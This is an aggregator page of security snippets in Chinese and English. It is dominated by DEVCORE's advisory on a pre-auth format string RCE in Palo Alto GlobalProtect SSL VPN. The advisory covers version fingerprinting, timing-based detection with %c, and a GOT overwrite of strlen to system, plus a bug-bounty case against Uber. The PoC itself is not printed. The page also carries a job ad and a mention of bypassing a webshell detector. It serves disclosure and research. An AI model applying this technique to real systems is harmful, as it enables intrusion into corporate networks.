Aggregator

最近开始入门pwn，在白泽新手oj那里学了一波之后开始自己学剩下的内容。看到atum大佬推荐的三道基础ROP题目，就练习一下，学习思路总结经验。在网上找题的过程中发现vss基本上绝迹了。。。辛苦一番之后终于找到，为了后面的人也能快速找到题目我就把三道题一起上传了。

帮着公司审着代码, 发现一个 PHP 挺好玩的特性, 突发奇想, 想看看能不能绕 D 盾, 没想到就成了.

戴夫寇爾即將滿七年了，過去我們不斷地鑽研進階攻擊技巧，為許多客戶提供高品質的滲透測試服務，也成為客戶最信賴的資安伙伴之一。在 2017 年我們更成為第一個在台灣推出紅隊演練服務的本土廠商，透過無所不用其極的駭客思維，陸續為電子商務、政府部門、金融業者執行最真實且全面的攻擊演練，同時也累積了豐富的經驗與案例，成為台灣紅隊演練實力最深厚的服務供應商。

在 2015 年我們曾經公開徵求一位行政出納人才，後來經過層層的履歷審核、筆試、面試，終於順利找到一位經驗豐富且值得信賴的生活駭客，成為我們最強而有力的後勤伙伴。但是隨著團隊人數增長、業務規模大幅增加、事務分工專業化，行政部門的眾多工作已經無法由單一人力獨自負荷。

因此今年我們再度公開招募行政人才，希望能夠找到一位行政專員，擴大我們的後勤能量，鞏固戴夫寇爾的團隊作戰能力，讓我們持續為企業提供最優異的資安服務。

我們非常渴望您的加入，若您有意成為戴夫寇爾的一員，可參考下列職缺細節：

• 庶務性行政工作 50%
  • 人員接待，例如：電話接聽、來訪人員接待
  • 文件收發，例如：郵務作業、快遞服務
  • 檔案管理，例如：名片掃描、合約掃描、範本檔案格式調整
  • 資料蒐集，例如：各類公司業務需求資料查找
• 總務工作 20%
  • 辦公室各類用品採買
  • 辦公室環境維護
• 採購工作 15%
  • 設備採購管理
  • 服務供應商管理
• 人事工作 5%
  • 保險事務，例如：團體保險、旅遊不便險
  • 差旅行程，例如：交通票券訂購、簽證辦理
  • 教育訓練安排
• 其他主管交辦事項 10%

10:00 - 18:00

台北市中山區復興北路 168 號 10 樓 （捷運南京復興站 8 號出口，走路約 3 分鐘）

• 細心嚴謹，能耐心的處理繁瑣的庶務工作。
• 主動積極，看到我們沒發現的細節，超越我們所期望的基準。
• 懂得溝通傾聽，能同理他人，找出彼此共識。
• 擅長邏輯思考，懂得透過淺顯易懂且條理清晰的方式傳達自己的想法。
• 良好的時間管理能力，依據任務的優先順序，有效率的完成每項交辦。
• 勇於接受挑戰且具備解決問題的能力，努力克服未知的難題。

• 需有三年以上行政相關工作經驗
• 熟悉 Google Sheets 操作，且具獨立撰寫試算表公式的能力
• 習慣使用雲端服務，如：Google Drive, Dropbox 或其他

• 您使用過專案管理系統，如：Trello, Basecamp, Redmine 或其他
  您將會使用專案管理系統管理平日任務。
• 您是 MAC 使用者
  您未來的電腦會是 MAC，我們希望您越快順暢使用電腦越好。
• 您是生活駭客
  您不需要會寫程式，但您習慣觀察生活中的規律，並想辦法利用這些規律有效率的解決問題。

• 您會在一個開闊的辦公環境工作
• 您會擁有一張 Aeron 人體工學椅
• 每週補滿飲料（另有咖啡機）、零食，讓您保持心情愉快
• 公司提供飛鏢機讓您發洩對主管的怨氣

我們注重公司每位同仁的身心健康，請參考以下福利制度：

• 休假福利
  • 到職即可預支當年度特休
  • 每年五天全薪病假
• 獎金福利
  • 三節禮金（春節、端午節、中秋節）
  • 生日禮金
  • 婚喪補助
• 休閒福利
  • 員工旅遊
  • 舒壓按摩
  • Team Building
• 美食福利
  • 零食飲料
  • 員工聚餐
• 健康福利
  • 員工健康檢查
  • 運動中心健身券
• 進修福利
  • 內部教育訓練
  • 外部進修課程
• 其他
  • 專業的公司團隊
  • 扁平的內部組織
  • 順暢的溝通氛圍

新台幣 34,000 - 40,000 （保證年薪 14 個月）

• 請將您的履歷以 PDF 格式寄到 [email protected]
  • 履歷格式請參考範例示意（DOC、PAGES、PDF）並轉成 PDF。若您有自信，也可以自由發揮最能呈現您能力的履歷。
• 標題格式：[應徵] 行政專員 您的姓名（範例：[應徵] 行政專員 王小美）
• 履歷內容請務必控制在兩頁以內，至少需包含以下內容：
  • 基本資料
  • 學歷
  • 工作經歷
  • 社群活動經歷
  • 特殊事蹟
  • MBTI 職業性格測試結果（測試網頁）

我們會在兩週內主動與您聯繫，招募過程依序為書面審核、線上測驗以及面試三個階段。最快將於八月中進行第二階段的線上測驗，煩請耐心等候。 由於最近業務較為忙碌，若有應徵相關問題，請一律使用 Email 聯繫，造成您的不便請見諒。

我們選擇優先在部落格公布徵才資訊，是希望您也對資訊安全議題感興趣，即使不懂技術也想為台灣資安盡一點力。無論如何，我們都感謝您的來信，期待您的加入！

这题是在比赛结束后才做出来的, 比较可惜, 但是题目本身还是比较有意思的, 所以写个 Writeup.
(早知道早点起床做题了

If you’ve been on social media recently, you’ve probably seen some people in your feed posting images of themselves looking...

The post Downloaded FaceApp? Here’s How Your Privacy Is Now Affected appeared first on McAfee Blog.

在我們進行紅隊演練的過程中，發現目標使用的 Palo Alto GlobalProtect 存在 format string 弱點，透過此弱點可控制該 SSL VPN 伺服器，並藉此進入企業內網。

回報原廠後，得知這是個已知弱點並且已經 silent-fix 了，所以並未有 CVE 編號。經過我們分析，存在風險的版本如下，建議用戶儘速更新至最新版以避免遭受攻擊。

• Palo Alto GlobalProtect SSL VPN 7.1.x < 7.1.19
• Palo Alto GlobalProtect SSL VPN 8.0.x < 8.0.12
• Palo Alto GlobalProtect SSL VPN 8.1.x < 8.1.3

9.x 和 7.0.x 並沒有存在風險。

我們也利用了這個弱點成功控制了 Uber 的 VPN 伺服器，詳細的技術細節請參閱我們的 Advisory： https://devco.re/blog/2019/07/17/attacking-ssl-vpn-part-1-PreAuth-RCE-on-Palo-Alto-GlobalProtect-with-Uber-as-case-study/

這將會是我們 SSL VPN 研究的系列文，預計會有三篇。這也是我們研究團隊今年在 Black Hat USA 和 DEFCON 的演講『 Infiltrating Corporate Intranet Like NSA - Pre-auth RCE on Leading SSL VPNs 』中的一小部分，敬請期待！

Author: Orange Tsai(@orange_8361) and Meh Chang(@mehqq_)

SSL VPNs protect corporate assets from Internet exposure, but what if SSL VPNs themselves are vulnerable? They’re exposed to the Internet, trusted to reliably guard the only way to your intranet. Once the SSL VPN server is compromised, attackers can infiltrate your Intranet and even take over all users connecting to the SSL VPN server! Due to its importance, in the past several months, we started a new research on the security of leading SSL VPN products.

We plan to publish our results on 3 articles. We put this as the first one because we think this is an interesting story and is very suitable as an appetizer of our Black Hat USA and DEFCON talk:

• Infiltrating Corporate Intranet Like NSA - Pre-auth RCE on Leading SSL VPNs!

Don’t worry about the spoilers, this story is not included in our BHUSA/DEFCON talks.

In our incoming presentations, we will provide more hard-core exploitations and crazy bugs chains to hack into your SSL VPN. From how we jailbreak the appliance and what attack vectors we are focusing on. We will also demonstrate gaining root shell from the only exposed HTTPS port, covertly weaponizing the server against their owner, and abusing a hidden feature to take over all VPN clients! So please look forward to it ;)

In this article, we would like to talk about the vulnerability on Palo Alto SSL VPN. Palo Alto calls their SSL VPN product line as GlobalProtect. You can easily identify the GlobalPortect service via the 302 redirection to /global-protect/login.esp on web root!

About the vulnerability, we accidentally discovered it during our Red Team assessment services. At first, we thought this is a 0day. However, we failed reproducing on the remote server which is the latest version of GlobalProtect. So we began to suspect if this is a known vulnerability.

We searched all over the Internet, but we could not find anything. There is no public RCE exploit before[1], no official advisory contains anything similar and no CVE. So we believe this must be a silent-fix 1-day!

[1] There are some exploit about the Pan-OS management interface before such as the CVE-2017-15944 and the excellent Troppers16 paper by @_fel1x, but unfortunately, they are not talking about the GlobalProtect and the management interface is only exposed to the LAN port

The bug is very straightforward. It is just a simple format string vulnerability with no authentication required! The sslmgr is the SSL gateway handling the SSL handshake between the server and clients. The daemon is exposed by the Nginx reverse proxy and can be touched via the path /sslmgr.

During the parameter extraction, the daemon searches the string scep-profile-name and pass its value as the snprintf format to fill in the buffer. That leads to the format string attack. You can just crash the service with %n!

According to our survey, all the GlobalProtect before July 2018 are vulnerable! Here is the affect version list:

• Palo Alto GlobalProtect SSL VPN 7.1.x < 7.1.19
• Palo Alto GlobalProtect SSL VPN 8.0.x < 8.0.12
• Palo Alto GlobalProtect SSL VPN 8.1.x < 8.1.3

The series 9.x and 7.0.x are not affected by this vulnerability.

Although we know where the bug is, to verify the vulnerability is still not easy. There is no output for this format string so that we can’t obtain any address-leak to verify the bug. And to crash the service is never our first choice[1]. In order to avoid crashes, we need to find a way to verify the vulnerability elegantly!

By reading the snprintf manual, we choose the %c as our gadget! When there is a number before the format, such as %9999999c, the snprintf repeats the corresponding times internally. We observe the response time of large repeat number to verify this vulnerability!

As you can see, the response time increases along with the number of %c. So, from the time difference, we can identify the vulnerable SSL VPN elegantly!

[1] Although there is a watchdog monitoring the sslmgr daemon, it’s still improper to crash a service!

Once we can verify the bug, the exploitation is easy. To exploit the binary successfully, we need to determine the detail version first. We can distinguish by the Last-Modified header, such as the /global-protect/portal/css/login.css from 8.x version and the /images/logo_pan_158.gif from 7.x version!

With a specified version, we can write our own exploit now. We simply modified the pointer of strlen on the Global Offset Table(GOT) to the Procedure Linkage Table(PLT) of system. Here is the PoC:

Once the modification is done, the sslmgr becomes our webshell and we can execute commands via:

We have reported this bug to Palo Alto via the report form. However, we got the following reply:

Hello Orange,

Thanks for the submission. Palo Alto Networks does follow coordinated vulnerability disclosure for security vulnerabilities that are reported to us by external researchers. We do not CVE items found internally and fixed. This issue was previously fixed, but if you find something in a current version, please let us know.

Kind regards

Hmmm, so it seems this vulnerability is known for Palo Alto, but not ready for the world!

After we awared this is not a 0day, we surveyed all Palo Alto SSL VPN over the world to see if there is any large corporations using the vulnerable GlobalProtect, and Uber is one of them! From our survey, Uber owns about 22 servers running the GlobalProtect around the world, here we take vpn.awscorp.uberinternal.com as an example!

From the domain name, we guess Uber uses the BYOL from AWS Marketplace. From the login page, it seems Uber uses the 8.x version, and we can target the possible target version from the supported version list on the Marketplace overview page:

• 8.0.3
• 8.0.6
• 8.0.8
• 8.0.9
• 8.1.0

Finally, we figured out the version, it’s 8.0.6 and we got the shell back!

Uber took a very quick response and right step to fix the vulnerability and Uber gave us a detail explanation to the bounty decision:

Hey @orange — we wanted to provide a little more context on the decision for this bounty. During our internal investigation, we found that the Palo Alto SSL VPN is not the same as the primary VPN which is used by the majority of our employees.

Additionally, we hosted the Palo Alto SSL VPN in AWS as opposed to our core infrastructure; as such, this would not have been able to access any of our internal infrastructure or core services. For these reasons, we determined that while it was an unauthenticated RCE, the overall impact and positional advantage of this was low. Thanks again for an awesome report!

It’s a fair decision. It’s always a great time communicating with Uber and report to their bug bounty program. We don’t care about the bounty that much, because we enjoy the whole research process and feeding back to the security community! Nothing can be better than this!